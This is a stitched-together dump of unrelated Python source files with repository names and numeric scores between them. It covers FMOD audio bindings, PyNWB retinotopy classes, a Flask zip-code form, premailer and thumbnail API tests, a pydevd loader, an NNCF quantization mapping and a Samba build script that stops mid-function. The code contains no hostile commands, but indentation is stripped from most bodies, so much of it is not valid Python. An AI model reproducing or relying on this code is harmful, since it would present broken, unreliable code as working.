return [freq.value, vol.value, pan.value, pri.value]
@_defaults.setter
def _defaults(self, vals):
ckresult(_dll.FMOD_Sound_SetDefaults(self._ptr, c_float(vals[0]), c_float(vals[1]), c_float(vals[2]), vals[3]))
@property
def default_frequency(self):
return self._defaults[0]
@default_frequency.setter
def default_frequency(self, freq):
d = self._defaults
d[0] = freq
self._defaults = d
@property
def default_volume(self):
return self._defaults[1]
@default_volume.setter
def default_volume(self, vol):
d = self._defaults
d[1] = vol
self._defaults = d
@property
def default_pan(self):
return self._defaults[2]
@default_pan.setter
def default_pan(self, pan):
d = self._defaults
d[2] = pan
self._defaults = d
@property
def default_priority(self):
return self._defaults[3]
@default_priority.setter
def default_priority(self, pri):
d = self._defaults
d[3] = pri
self._defaults = d
@property
def format(self):
type = c_int()
format = c_int()
bits = c_int()
ckresult(_dll.FMOD_Sound_GetFormat(self._ptr, byref(type), byref(format), byref(bits)))
return so(type=type.value, format=format.value, bits=bits.value)
def get_length(self, ltype):
len = c_uint()
ckresult(_dll.FMOD_Sound_GetLength(self._ptr, byref(len), ltype))
return len.value
@property
def loop_count(self):
c = c_int()
ckresult(_dll.FMOD_Sound_GetLoopCount(self._ptr, byref(c)))
return c.value
@loop_count.setter
def loop_count(self, count):
ckresult(_dll.FMOD_Sound_SetLoopCount(self._ptr, count))
@property
def loop_points(self):
"""Returns tuple of two tuples ((start, startunit),(end, endunit))"""
start = c_uint()
startunit = c_int()
end = c_uint()
endunit = c_int()
ckresult(_dll.FMOD_Sound_GetLoopPoints(self._ptr, byref(start), byref(startunit), byref(end), byref(endunit)))
return ((start.value, startunit.value), (end.value, endunit.value))
@loop_points.setter
def loop_points(self, p):
"""Same format as returned from this property is required to successfully call this setter."""
ckresult(_dll.FMOD_Sound_SetLoopPoints(self._ptr, p[0][0], p[0][1], p[1][0], p[1][1]))
@property
def mode(self):
mode = c_int()
ckresult(_dll.FMOD_Sound_GetMode(self._ptr, byref(mode)))
return mode.value
@mode.setter
def mode(self, m):
ckresult(_dll.FMOD_Sound_SetMode(self._ptr, m))
def get_music_channel_volume(self, channel):
v = c_float()
ckresult(_dll.FMOD_Sound_GetMusicChannelVolume(self._ptr, channel, byref(v)))
return v.value
def set_music_channel_volume(self, id, vol):
ckresult(_dll.FMOD_Sound_SetMusicChannelVolume(self._ptr, id, c_float(vol)))
@property
def num_music_channels(self):
num = c_int()
ckresult(_dll.FMOD_Sound_GetMusicNumChannels(self._ptr, byref(num)))
return num.value
@property
def name(self):
name = create_string_buffer(256)
ckresult(_dll.FMOD_Sound_GetName(self._ptr, byref(name), 256))
return name.value
@property
def num_subsounds(self):
num = c_int()
ckresult(_dll.FMOD_Sound_GetNumSubSounds(self._ptr, byref(num)))
return num.value
@property
def num_sync_points(self):
num = c_int()
ckresult(_dll.FMOD_Sound_GetNumSyncPoints(self._ptr, byref(num)))
return num.value
@property
def num_tags(self):
num = c_int()
ckresult(_dll.FMOD_Sound_GetNumTags(self._ptr, byref(num)))
return num.value
@property
def open_state(self):
state = c_int()
percentbuffered = c_uint()
starving = c_bool()
diskbusy = c_bool()
ckresult(_dll.FMOD_Sound_GetOpenState(self._ptr, byref(state), byref(percentbuffered), byref(starving),
byref(diskbusy)))
return so(state=state.value, percent_buffered=percentbuffered.value, starving=starving.value,
disk_busy=diskbusy.value)
@property
def sound_group(self):
grp_ptr = c_void_p()
ckresult(_dll.FMOD_Sound_GetSoundGroup(self._ptr, byref(grp_ptr)))
return get_class("SoundGroup")(grp_ptr)
@sound_group.setter
def sound_group(self, group):
check_type(group, get_class("SoundGroup"))
ckresult(_dll.FMOD_Sound_SetSoundGroup(self._ptr, group._ptr))
def get_subsound(self, index):
sh_ptr = c_void_p()
ckresult(_dll.FMOD_Sound_GetSubSound(self._ptr, index, byref(sh_ptr)))
return Sound(sh_ptr)
def get_sync_point(self, index):
sp = c_int()
ckresult(_dll.FMOD_Sound_GetSyncPoint(self._ptr, index, byref(sp)))
return sp.value
def get_sync_point_info(self, point):
name = c_char_p()
offset = c_uint()
offsettype = c_int()
ckresult(_dll.FMOD_Sound_GetSyncPointInfo(self._ptr, point, byref(name), 256, byref(offset), byref(offsettype)))
return so(name=name.value, offset=offset.value, offset_type=offsettype.value)
@property
def system_object(self):
sptr = c_void_p()
ckresult(_dll.FMOD_Sound_GetSystemObject(self._ptr, byref(sptr)))
return get_class("System")(sptr, False)
def play(self, paused=False):
return self.system_object.play_sound(self, paused)
def get_tag(self, index, name=None):
tag = TAG()
ckresult(_dll.FMOD_Sound_GetTag(self._ptr, name, index, byref(tag)))
return tag
@property
def _variations(self):
freq = c_float()
vol = c_float()
pan = c_float()
ckresult(_dll.FMOD_Sound_GetVariations(self._ptr, byref(freq), byref(vol), byref(pan)))
return [freq.value, vol.value, pan.value]
@_variations.setter
def _variations(self, vars):
ckresult(_dll.FMOD_Sound_SetVariations(self._ptr, c_float(vars[0]), c_float(vars[1]), c_float(vars[2])))
@property
def frequency_variation(self):
return self._variations[0]
@frequency_variation.setter
def frequency_variation(self, var):
v = self._variations
v[0] = var
        self._variations = v
@property
def volume_variation(self):
return self._variations[1]
@volume_variation.setter
def volume_variation(self, var):
v = self._variations
v[1] = var
        self._variations = v
@property
def pan_variation(self):
return self._variations[2]
@pan_variation.setter
def pan_variation(self, var):
v = self._variations
v[2] = var
        self._variations = v
def lock(self, offset, length):
ptr1 = c_void_p()
len1 = c_uint()
ptr2 = c_void_p()
len2 = c_uint()
ckresult(_dll.FMOD_Sound_Lock(self._ptr, offset, length, byref(ptr1), byref(ptr2), byref(len1), byref(len2)))
return ((ptr1, len1), (ptr2, len2))
def release(self):
ckresult(_dll.FMOD_Sound_Release(self._ptr))
def set_subsound(self, index, snd):
check_type(snd, Sound)
ckresult(_dll.FMOD_Sound_SetSubSound(self._ptr, index, snd._ptr))
def set_subsound_sentence(self, sounds):
a = c_int * len(sounds)
ptrs = [o._ptr for o in sounds]
ai = a(*ptrs)
ckresult(_dll.FMOD_Sound_SetSubSoundSentence(self._ptr, ai, len(ai)))
def unlock(self, i1, i2):
"""I1 and I2 are tuples of form (ptr, len)."""
ckresult(_dll.FMOD_Sound_Unlock(self._ptr, i1[0], i2[0], i1[1], i2[1]))
@property
def music_speed(self):
speed = c_float()
self._call_fmod("FMOD_Sound_GetMusicSpeed", byref(speed))
return speed.value
@music_speed.setter
def music_speed(self, speed):
self._call_fmod("FMOD_Sound_SetMusicSpeed", c_float(speed))
def read_data(self, length):
"""Read a fragment of the sound's decoded data.
:param length: The requested length.
:returns: The data and the actual length.
:rtype: Tuple of the form (data, actual)."""
buf = create_string_buffer(length)
actual = c_uint()
self._call_fmod("FMOD_Sound_ReadData", buf, length, byref(actual))
return buf.value, actual.value
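    # Hedged usage sketch (added for illustration; 'snd' stands for a Sound
    # instance obtained from a pyfmodex System object):
    #   data, actual = snd.read_data(4096)  # up to 4096 bytes of decoded audio
    #   snd.seek_data(0)                    # rewind to the first PCM sample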
def seek_data(self, offset):
"""Seeks for data reading purposes.
:param offset: The offset to seek to in PCM samples.
:type offset: Int or long, but must be in range of an unsigned long, not python's arbitrary long."""
self._call_fmod("FMOD_Sound_SeekData", offset) | 2.0625 | 2 |
src/pynwb/retinotopy.py | weiglszonja/pynwb | 132 | 11332 | <reponame>weiglszonja/pynwb
from collections.abc import Iterable
import warnings
from hdmf.utils import docval, popargs, call_docval_func, get_docval
from . import register_class, CORE_NAMESPACE
from .core import NWBDataInterface, NWBData
class RetinotopyImage(NWBData):
"""Gray-scale anatomical image of cortical surface. Array structure: [rows][columns]
"""
__nwbfields__ = ('bits_per_pixel',
'dimension',
'format',
'field_of_view')
@docval({'name': 'name', 'type': str, 'doc': 'Name of this retinotopy image'},
{'name': 'data', 'type': Iterable, 'doc': 'Data field.'},
{'name': 'bits_per_pixel', 'type': int,
'doc': 'Number of bits used to represent each value. This is necessary to determine maximum '
'(white) pixel value.'},
{'name': 'dimension', 'type': Iterable, 'shape': (2, ), 'doc': 'Number of rows and columns in the image.'},
{'name': 'format', 'type': Iterable, 'doc': 'Format of image. Right now only "raw" supported.'},
{'name': 'field_of_view', 'type': Iterable, 'shape': (2, ), 'doc': 'Size of viewing area, in meters.'})
def __init__(self, **kwargs):
bits_per_pixel, dimension, format, field_of_view = popargs(
'bits_per_pixel', 'dimension', 'format', 'field_of_view', kwargs)
call_docval_func(super().__init__, kwargs)
self.bits_per_pixel = bits_per_pixel
self.dimension = dimension
self.format = format
self.field_of_view = field_of_view
class FocalDepthImage(RetinotopyImage):
"""Gray-scale image taken with same settings/parameters (e.g., focal depth,
wavelength) as data collection. Array format: [rows][columns].
"""
__nwbfields__ = ('focal_depth', )
@docval(*get_docval(RetinotopyImage.__init__),
{'name': 'focal_depth', 'type': 'float', 'doc': 'Focal depth offset, in meters.'})
def __init__(self, **kwargs):
focal_depth = popargs('focal_depth', kwargs)
call_docval_func(super().__init__, kwargs)
self.focal_depth = focal_depth
class RetinotopyMap(NWBData):
"""Abstract two-dimensional map of responses to stimuli along a single response axis (e.g., altitude)
"""
__nwbfields__ = ('field_of_view',
'dimension')
@docval({'name': 'name', 'type': str, 'doc': 'the name of this axis map'},
{'name': 'data', 'type': Iterable, 'shape': (None, None), 'doc': 'data field.'},
{'name': 'field_of_view', 'type': Iterable, 'shape': (2, ), 'doc': 'Size of viewing area, in meters.'},
{'name': 'dimension', 'type': Iterable, 'shape': (2, ),
'doc': 'Number of rows and columns in the image'})
def __init__(self, **kwargs):
field_of_view, dimension = popargs('field_of_view', 'dimension', kwargs)
call_docval_func(super().__init__, kwargs)
self.field_of_view = field_of_view
self.dimension = dimension
class AxisMap(RetinotopyMap):
"""Abstract two-dimensional map of responses to stimuli along a single response axis (e.g., altitude) with unit
"""
__nwbfields__ = ('unit', )
@docval(*get_docval(RetinotopyMap.__init__, 'name', 'data', 'field_of_view'),
{'name': 'unit', 'type': str, 'doc': 'Unit that axis data is stored in (e.g., degrees)'},
*get_docval(RetinotopyMap.__init__, 'dimension'))
def __init__(self, **kwargs):
unit = popargs('unit', kwargs)
call_docval_func(super().__init__, kwargs)
self.unit = unit
@register_class('ImagingRetinotopy', CORE_NAMESPACE)
class ImagingRetinotopy(NWBDataInterface):
"""
Intrinsic signal optical imaging or widefield imaging for measuring retinotopy. Stores orthogonal
maps (e.g., altitude/azimuth; radius/theta) of responses to specific stimuli and a combined
polarity map from which to identify visual areas.
This group does not store the raw responses imaged during retinotopic mapping or the
stimuli presented, but rather the resulting phase and power maps after applying a Fourier
transform on the averaged responses.
Note: for data consistency, all images and arrays are stored in the format [row][column] and
[row, col], which equates to [y][x]. Field of view and dimension arrays may appear backward
(i.e., y before x).
"""
__nwbfields__ = ({'name': 'sign_map', 'child': True},
{'name': 'axis_1_phase_map', 'child': True},
{'name': 'axis_1_power_map', 'child': True},
{'name': 'axis_2_phase_map', 'child': True},
{'name': 'axis_2_power_map', 'child': True},
{'name': 'focal_depth_image', 'child': True},
{'name': 'vasculature_image', 'child': True},
'axis_descriptions')
@docval({'name': 'sign_map', 'type': RetinotopyMap,
'doc': 'Sine of the angle between the direction of the gradient in axis_1 and axis_2.'},
{'name': 'axis_1_phase_map', 'type': AxisMap,
'doc': 'Phase response to stimulus on the first measured axis.'},
{'name': 'axis_1_power_map', 'type': AxisMap,
'doc': 'Power response on the first measured axis. Response is scaled so 0.0 is no power in '
'the response and 1.0 is maximum relative power.'},
{'name': 'axis_2_phase_map', 'type': AxisMap,
'doc': 'Phase response to stimulus on the second measured axis.'},
{'name': 'axis_2_power_map', 'type': AxisMap,
'doc': 'Power response on the second measured axis. Response is scaled so 0.0 is no '
'power in the response and 1.0 is maximum relative power.'},
{'name': 'axis_descriptions', 'type': Iterable, 'shape': (2, ),
'doc': 'Two-element array describing the contents of the two response axis fields. '
'Description should be something like ["altitude", "azimuth"] or ["radius", "theta"].'},
{'name': 'focal_depth_image', 'type': FocalDepthImage,
'doc': 'Gray-scale image taken with same settings/parameters (e.g., focal depth, wavelength) '
'as data collection. Array format: [rows][columns].'},
{'name': 'vasculature_image', 'type': RetinotopyImage,
'doc': 'Gray-scale anatomical image of cortical surface. Array structure: [rows][columns].'},
{'name': 'name', 'type': str, 'doc': 'the name of this container', 'default': 'ImagingRetinotopy'})
def __init__(self, **kwargs):
axis_1_phase_map, axis_1_power_map, axis_2_phase_map, axis_2_power_map, axis_descriptions, \
focal_depth_image, sign_map, vasculature_image = popargs(
'axis_1_phase_map', 'axis_1_power_map', 'axis_2_phase_map', 'axis_2_power_map',
'axis_descriptions', 'focal_depth_image', 'sign_map', 'vasculature_image', kwargs)
call_docval_func(super().__init__, kwargs)
warnings.warn("The ImagingRetinotopy class currently cannot be written to or read from a file. "
"This is a known bug and will be fixed in a future release of PyNWB.")
self.axis_1_phase_map = axis_1_phase_map
self.axis_1_power_map = axis_1_power_map
self.axis_2_phase_map = axis_2_phase_map
self.axis_2_power_map = axis_2_power_map
self.axis_descriptions = axis_descriptions
self.focal_depth_image = focal_depth_image
self.sign_map = sign_map
self.vasculature_image = vasculature_image
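
# --- Illustrative construction sketch (added for this excerpt; not part of PyNWB) ---
# Shapes and values below are placeholders; the argument names follow the docval
# specifications above. Note the warning in __init__: this container cannot yet be
# round-tripped through a file.
if __name__ == "__main__":
    import numpy as np

    rows, cols = 256, 256
    fov = [0.0032, 0.0032]
    axis_1_phase = AxisMap(name='axis_1_phase_map', data=np.zeros((rows, cols)),
                           field_of_view=fov, unit='degrees', dimension=[rows, cols])
    axis_1_power = AxisMap(name='axis_1_power_map', data=np.zeros((rows, cols)),
                           field_of_view=fov, unit='relative power', dimension=[rows, cols])
    axis_2_phase = AxisMap(name='axis_2_phase_map', data=np.zeros((rows, cols)),
                           field_of_view=fov, unit='degrees', dimension=[rows, cols])
    axis_2_power = AxisMap(name='axis_2_power_map', data=np.zeros((rows, cols)),
                           field_of_view=fov, unit='relative power', dimension=[rows, cols])
    sign = RetinotopyMap(name='sign_map', data=np.zeros((rows, cols)),
                         field_of_view=fov, dimension=[rows, cols])
    focal = FocalDepthImage(name='focal_depth_image',
                            data=np.zeros((rows, cols), dtype=np.uint16),
                            bits_per_pixel=16, dimension=[rows, cols], format='raw',
                            field_of_view=fov, focal_depth=0.0)
    vasculature = RetinotopyImage(name='vasculature_image',
                                  data=np.zeros((rows, cols), dtype=np.uint16),
                                  bits_per_pixel=16, dimension=[rows, cols], format='raw',
                                  field_of_view=fov)
    retinotopy = ImagingRetinotopy(
        sign_map=sign, axis_1_phase_map=axis_1_phase, axis_1_power_map=axis_1_power,
        axis_2_phase_map=axis_2_phase, axis_2_power_map=axis_2_power,
        axis_descriptions=['altitude', 'azimuth'], focal_depth_image=focal,
        vasculature_image=vasculature)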
| 2.1875 | 2 |
GreenMoon/forms.py | ma010/green-moon | 0 | 11333 | <reponame>ma010/green-moon
"""
Implement a class function for user to put in a zip-code and
search relevant information about business entities in that zip-code area.
"""
from flask.ext.wtf import Form
from wtforms import StringField, BooleanField
from wtforms.validators import DataRequired
class inputZipForm(Form):
inputZip = StringField('inputZip', validators=[DataRequired()])
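
# --- Illustrative usage sketch (added; not part of the original module) ---
# A typical Flask view using this form might look like the sketch below; the app
# object, endpoint names and template are assumptions. Note that on current
# Flask/Flask-WTF versions the import above would be `from flask_wtf import
# FlaskForm` instead of the removed `flask.ext.wtf` path.
#
#     @app.route('/search', methods=['GET', 'POST'])
#     def search():
#         form = inputZipForm()
#         if form.validate_on_submit():
#             return redirect(url_for('results', zipcode=form.inputZip.data))
#         return render_template('search.html', form=form)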
| 2.96875 | 3 |
Phase-2/Linked List/Day-70.py | CodedLadiesInnovateTech/python-challenges | 11 | 11334 | <reponame>CodedLadiesInnovateTech/python-challenges<gh_stars>10-100
'''
1. Write a Python program to access a specific item in a singly linked list using index value.
2. Write a Python program to set a new value of an item in a singly linked list using index value.
3. Write a Python program to delete the first item from a singly linked list.
'''
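
# --- Illustrative sketch (added; not part of the original challenge file) ---
# One possible minimal singly linked list covering the three exercises above.
class Node:
    def __init__(self, data):
        self.data = data
        self.next = None


class SinglyLinkedList:
    def __init__(self):
        self.head = None

    def append(self, data):
        node = Node(data)
        if self.head is None:
            self.head = node
            return
        cur = self.head
        while cur.next:
            cur = cur.next
        cur.next = node

    def _node_at(self, index):
        cur = self.head
        for _ in range(index):
            if cur is None:
                break
            cur = cur.next
        if cur is None:
            raise IndexError('index out of range')
        return cur

    def get(self, index):           # exercise 1: access an item by index
        return self._node_at(index).data

    def set(self, index, value):    # exercise 2: set a new value by index
        self._node_at(index).data = value

    def delete_first(self):         # exercise 3: delete the first item
        if self.head is not None:
            self.head = self.head.next


if __name__ == '__main__':
    lst = SinglyLinkedList()
    for item in ('a', 'b', 'c'):
        lst.append(item)
    print(lst.get(1))    # -> b
    lst.set(1, 'B')
    lst.delete_first()
    print(lst.get(0))    # -> B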
| 3.9375 | 4 |
ngboost/version.py | dsharpc/ngboost | 0 | 11335 | <reponame>dsharpc/ngboost
__version__ = "0.3.4dev"
| 0.839844 | 1 |
premailer/tests/test_utils.py | p12tic/premailer | 0 | 11336 | <gh_stars>0
import unittest
from premailer.premailer import capitalize_float_margin
class UtilsTestCase(unittest.TestCase):
def testcapitalize_float_margin(self):
self.assertEqual(
capitalize_float_margin('margin:1em'),
'Margin:1em')
self.assertEqual(
capitalize_float_margin('margin-left:1em'),
'Margin-left:1em')
self.assertEqual(
capitalize_float_margin('float:right;'),
'Float:right;')
self.assertEqual(
capitalize_float_margin('float:right;color:red;margin:0'),
'Float:right;color:red;Margin:0')
| 3.0625 | 3 |
home/vscode/extensions/ms-python.python-2021.12.1559732655/pythonFiles/lib/python/debugpy/_vendored/pydevd/_pydevd_bundle/pydevd_cython_wrapper.py | qwertzy-antonio-godinho/dots | 6 | 11337 | <reponame>qwertzy-antonio-godinho/dots<filename>home/vscode/extensions/ms-python.python-2021.12.1559732655/pythonFiles/lib/python/debugpy/_vendored/pydevd/_pydevd_bundle/pydevd_cython_wrapper.py
import sys
try:
try:
from _pydevd_bundle_ext import pydevd_cython as mod
except ImportError:
from _pydevd_bundle import pydevd_cython as mod
except ImportError:
import struct
try:
is_python_64bit = (struct.calcsize('P') == 8)
except:
        # In Jython this call fails, but that is OK; we don't support Jython for speedups anyway.
raise ImportError
plat = '32'
if is_python_64bit:
plat = '64'
# We also accept things as:
#
# _pydevd_bundle.pydevd_cython_win32_27_32
# _pydevd_bundle.pydevd_cython_win32_34_64
#
# to have multiple pre-compiled pyds distributed along the IDE
# (generated by build_tools/build_binaries_windows.py).
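    # For example, 64-bit CPython 3.8 on Linux resolves to
    #   _pydevd_bundle.pydevd_cython_linux_38_64
    # (added note; derived from the mod_name format string below).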
mod_name = 'pydevd_cython_%s_%s%s_%s' % (sys.platform, sys.version_info[0], sys.version_info[1], plat)
check_name = '_pydevd_bundle.%s' % (mod_name,)
mod = getattr(__import__(check_name), mod_name)
# Regardless of how it was found, make sure it's later available as the
# initial name so that the expected types from cython in frame eval
# are valid.
sys.modules['_pydevd_bundle.pydevd_cython'] = mod
trace_dispatch = mod.trace_dispatch
PyDBAdditionalThreadInfo = mod.PyDBAdditionalThreadInfo
set_additional_thread_info = mod.set_additional_thread_info
global_cache_skips = mod.global_cache_skips
global_cache_frame_skips = mod.global_cache_frame_skips
_set_additional_thread_info_lock = mod._set_additional_thread_info_lock
fix_top_level_trace_and_get_trace_func = mod.fix_top_level_trace_and_get_trace_func
version = getattr(mod, 'version', 0)
| 1.71875 | 2 |
tests/test_thumbnails.py | pypeclub/openpype4-tests | 0 | 11338 | <reponame>pypeclub/openpype4-tests
from tests.fixtures import api, PROJECT_NAME
assert api
THUMB_DATA1 = b"thisisaveryrandomthumbnailcontent"
THUMB_DATA2 = b"thisihbhihjhuuyiooanothbnlcontent"
def test_folder_thumbnail(api):
response = api.post(
f"projects/{PROJECT_NAME}/folders",
name="testicek",
folderType="Asset",
)
assert response
folder_id = response.data["id"]
# Ensure we cannot create an empty thumbnail
assert not api.raw_post(
f"projects/{PROJECT_NAME}/folders/{folder_id}/thumbnail",
mime="image/png",
data=b"",
)
# Create a thumbnail for the folder
response = api.raw_post(
f"projects/{PROJECT_NAME}/folders/{folder_id}/thumbnail",
mime="image/png",
data=THUMB_DATA1,
)
assert response
# Ensure the thumbnail is there
response = api.raw_get(f"projects/{PROJECT_NAME}/folders/{folder_id}/thumbnail")
assert response == THUMB_DATA1
# Get the id of the thumbnail (we can re-use it later)
thumb1_id = api.get(
f"projects/{PROJECT_NAME}/folders/{folder_id}",
).data["thumbnailId"]
# Update thumbnail
response = api.raw_post(
f"projects/{PROJECT_NAME}/folders/{folder_id}/thumbnail",
mime="image/png",
data=THUMB_DATA2,
)
assert response
# Ensure the thumbnail changed
response = api.raw_get(f"projects/{PROJECT_NAME}/folders/{folder_id}/thumbnail")
assert response == THUMB_DATA2
# Let the folder use the old thumbnail
response = api.patch(
f"projects/{PROJECT_NAME}/folders/{folder_id}",
thumbnail_id=thumb1_id,
)
assert response
# Ensure the thumbnail is switched to the old one
response = api.raw_get(f"projects/{PROJECT_NAME}/folders/{folder_id}/thumbnail")
assert response == THUMB_DATA1
def test_version_thumbnail(api):
# Create folder/subset/version
response = api.post(
f"projects/{PROJECT_NAME}/folders",
name="test2",
folderType="Asset",
)
assert response
folder_id = response.data["id"]
response = api.post(
f"projects/{PROJECT_NAME}/subsets",
name="test2s",
family="theSopranos",
folderId=folder_id,
)
assert response
subset_id = response.data["id"]
response = api.post(
f"projects/{PROJECT_NAME}/versions",
version=1,
subsetId=subset_id,
)
version_id = response.data["id"]
# Create thumbnail for the version
response = api.raw_post(
f"projects/{PROJECT_NAME}/versions/{version_id}/thumbnail",
mime="image/png",
data=THUMB_DATA1,
)
assert response
# Verify that the thumbnail is there
response = api.raw_get(f"projects/{PROJECT_NAME}/versions/{version_id}/thumbnail")
assert response == THUMB_DATA1
| 2.46875 | 2 |
POO/Heranca/aula107_classes.py | pinheirogus/Curso-Python-Udemy | 1 | 11339 | # Generalizando para não repetir o código!
class Pessoa:
def __init__(self, nome, idade):
self.nome = nome
self.idade = idade
self.nomeclasse = self.__class__.__name__
def falar(self):
print(f'{self.nomeclasse} está falando.')
class Cliente(Pessoa):
def comprar(self):
print(f'{self.nomeclasse} está comprando...')
class Aluno(Pessoa):
def estudar(self):
print(f'{self.nomeclasse} está estudando...')
class ClienteVIP(Cliente):
def __init__(self, nome, idade, sobrenome):
super().__init__(nome, idade)
print(f'{self.nome}, {self.idade} anos, criado com sucesso.')
self.sobrenome = sobrenome
def falar(self):
Pessoa.falar(self)
        # Since the Cliente class does not define the falar() method, Python looks it up in the superclass.
Cliente.falar(self)
print(f'{self.nome} {self.sobrenome}') | 4.0625 | 4 |
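
# --- Illustrative usage sketch (added; not part of the original lesson file) ---
# The argument values below are placeholders.
if __name__ == '__main__':
    cliente = ClienteVIP('Maria', 30, 'Silva')  # prints the "criado com sucesso" message
    cliente.falar()    # runs Pessoa.falar() and Cliente.falar() (inherited), then prints the full name
    cliente.comprar()  # inherited from Cliente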
nncf/experimental/onnx/algorithms/quantization/default_quantization.py | vuiseng9/nncf_pytorch | 136 | 11340 | """
Copyright (c) 2022 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from nncf.common.quantization.quantizer_propagation.structs import QuantizationTrait
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXConvolutionMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXLinearMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXSigmoidMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXHardSigmoidMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXAveragePoolMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXGlobalAveragePoolMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXAddLayerMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXMulLayerMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXConcatLayerMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXBatchNormMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXResizeMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXSoftmaxMetatype
from nncf.common.graph.operator_metatypes import UnknownMetatype
DEFAULT_ONNX_QUANT_TRAIT_TO_OP_DICT = {
QuantizationTrait.INPUTS_QUANTIZABLE: [
ONNXConvolutionMetatype,
ONNXLinearMetatype,
ONNXAveragePoolMetatype,
ONNXGlobalAveragePoolMetatype,
ONNXAddLayerMetatype,
ONNXMulLayerMetatype,
ONNXBatchNormMetatype,
ONNXHardSigmoidMetatype,
ONNXResizeMetatype,
],
QuantizationTrait.NON_QUANTIZABLE: [ONNXSigmoidMetatype,
ONNXSoftmaxMetatype,
UnknownMetatype],
QuantizationTrait.CONCAT: [ONNXConcatLayerMetatype],
QuantizationTrait.OUTPUT_QUANTIZATION_AS_WEIGHTS: []
}
| 1.085938 | 1 |
Package/CONFIG.py | YuanYuLin/samba | 0 | 11341 | <filename>Package/CONFIG.py
import sys

import ops
import iopc
TARBALL_FILE="samba-4.8.4.tar.gz"
TARBALL_DIR="samba-4.8.4"
INSTALL_DIR="samba-bin"
pkg_path = ""
output_dir = ""
tarball_pkg = ""
tarball_dir = ""
install_dir = ""
install_tmp_dir = ""
cc_host = ""
tmp_include_dir = ""
dst_include_dir = ""
dst_lib_dir = ""
dst_usr_local_lib_dir = ""
def set_global(args):
global pkg_path
global output_dir
global tarball_pkg
global install_dir
global install_tmp_dir
global tarball_dir
global cc_host
global tmp_include_dir
global dst_include_dir
global dst_lib_dir
global dst_usr_local_lib_dir
global dst_usr_local_libexec_dir
global dst_usr_local_share_dir
global dst_usr_local_dir
global src_pkgconfig_dir
global dst_pkgconfig_dir
global dst_bin_dir
global dst_etc_dir
global install_test_utils
pkg_path = args["pkg_path"]
output_dir = args["output_path"]
tarball_pkg = ops.path_join(pkg_path, TARBALL_FILE)
install_dir = ops.path_join(output_dir, INSTALL_DIR)
install_tmp_dir = ops.path_join(output_dir, INSTALL_DIR + "-tmp")
tarball_dir = ops.path_join(output_dir, TARBALL_DIR)
cc_host_str = ops.getEnv("CROSS_COMPILE")
cc_host = cc_host_str[:len(cc_host_str) - 1]
tmp_include_dir = ops.path_join(output_dir, ops.path_join("include",args["pkg_name"]))
dst_include_dir = ops.path_join("include",args["pkg_name"])
dst_lib_dir = ops.path_join(install_dir, "lib")
dst_bin_dir = ops.path_join(install_dir, "bin")
dst_etc_dir = ops.path_join(install_dir, "etc")
dst_usr_local_lib_dir = ops.path_join(install_dir, "usr/local/lib")
dst_usr_local_dir = ops.path_join(install_dir, "usr/local")
dst_usr_local_libexec_dir = ops.path_join(install_dir, "usr/local/libexec")
dst_usr_local_share_dir = ops.path_join(install_dir, "usr/local/share")
src_pkgconfig_dir = ops.path_join(pkg_path, "pkgconfig")
dst_pkgconfig_dir = ops.path_join(install_dir, "pkgconfig")
if ops.getEnv("INSTALL_TEST_UTILS") == 'y':
install_test_utils = True
else:
install_test_utils = False
def MAIN_ENV(args):
set_global(args)
ops.exportEnv(ops.setEnv("CC", ops.getEnv("CROSS_COMPILE") + "gcc"))
'''
ops.exportEnv(ops.setEnv("CXX", ops.getEnv("CROSS_COMPILE") + "g++"))
ops.exportEnv(ops.setEnv("CPP", ops.getEnv("CROSS_COMPILE") + "g++"))
ops.exportEnv(ops.setEnv("AR", ops.getEnv("CROSS_COMPILE") + "ar"))
ops.exportEnv(ops.setEnv("RANLIB", ops.getEnv("CROSS_COMPILE") + "ranlib"))
ops.exportEnv(ops.setEnv("CROSS", ops.getEnv("CROSS_COMPILE")))
'''
ops.exportEnv(ops.setEnv("DESTDIR", install_tmp_dir))
return False
def MAIN_EXTRACT(args):
set_global(args)
ops.unTarGz(tarball_pkg, output_dir)
return True
def MAIN_PATCH(args, patch_group_name):
set_global(args)
for patch in iopc.get_patch_list(pkg_path, patch_group_name):
if iopc.apply_patch(tarball_dir, patch):
continue
else:
sys.exit(1)
return True
def MAIN_CONFIGURE(args):
set_global(args)
job_count = ops.getEnv("BUILD_JOBS_COUNT")
extra_conf = []
'''
#extra_conf.append("--cross-compile")
#extra_conf.append("-C -V")
#extra_conf.append("--cross-answers=cc.txt")
#extra_conf.append("--hostcc=" + cc_host)
extra_conf.append("--abi-check-disable")
extra_conf.append("--disable-rpath")
extra_conf.append("--bundled-libraries=NONE")
#extra_conf.append("--cross-execute='qemu-arm-static -L /usr/arm-linux-gnu'")
extra_conf.append("--jobs=" + job_count)
extra_conf.append("--disable-gnutls")
#extra_conf.append("--private-libraries=NONE")
extra_conf.append("--without-gettext")
extra_conf.append("--without-systemd")
extra_conf.append("--without-ad-dc")
extra_conf.append("--without-ads")
extra_conf.append("--without-winbind")
extra_conf.append("--without-ldap")
extra_conf.append("--without-pam")
extra_conf.append("--without-pie")
extra_conf.append("--without-fam")
extra_conf.append("--without-dmapi")
extra_conf.append("--without-automount")
extra_conf.append("--without-utmp")
extra_conf.append("--without-dnsupdate")
extra_conf.append("--without-acl-support")
extra_conf.append("--without-quotas")
extra_conf.append("--without-cluster-support")
extra_conf.append("--disable-glusterfs")
extra_conf.append("--without-profiling-data")
extra_conf.append("--without-libarchive")
extra_conf.append("--without-regedit")
extra_conf.append("--without-ntvfs-fileserver")
extra_conf.append("--disable-python")
